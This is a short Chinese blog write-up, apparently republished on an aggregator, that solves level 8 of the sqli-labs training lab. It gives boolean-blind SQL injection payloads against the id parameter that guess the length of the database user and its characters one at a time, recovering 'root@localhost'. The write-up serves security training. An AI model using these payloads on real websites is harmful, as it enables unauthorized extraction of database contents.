sqli-labs第八题 - 走看看

zoukankan html css js c++ java

sqli-labs第八题

1.注入单引号

触发错误，页面为空。

确认id参数为字符串型

2.注入布尔表达式

确认存在sql注入漏洞

3.利用布尔盲注，爆破用户名

查询用户名长度

?id=1' and (select length(user()))=14--+

使用二分法不断猜测长度值，直到页面返回正常

得到用户名长度为14

通过比对ascii码，逐个字符爆破用户名

?id=1' and (select ascii(substr(user(),1,1)))=115--+

......直到14个字符爆破完毕，得到用户名为root@localhost

查看全文

相关阅读:
CentOS 用命令访问网页
 ngalian(一)2：安装npm环境
 数仓建设原则探讨
 C#中获取系统时间 LZU
判断是否是数字类 LZU
Extjs中ComboBoxTree的实现 LZU
SQL之学生选课数据库 LZU
如何看书 LZU
面向对象思想 LZU
C#控件命名规范 LZU

原文地址：https://www.cnblogs.com/a-qi/p/13168639.html

Copyright © 2011-2022 走看看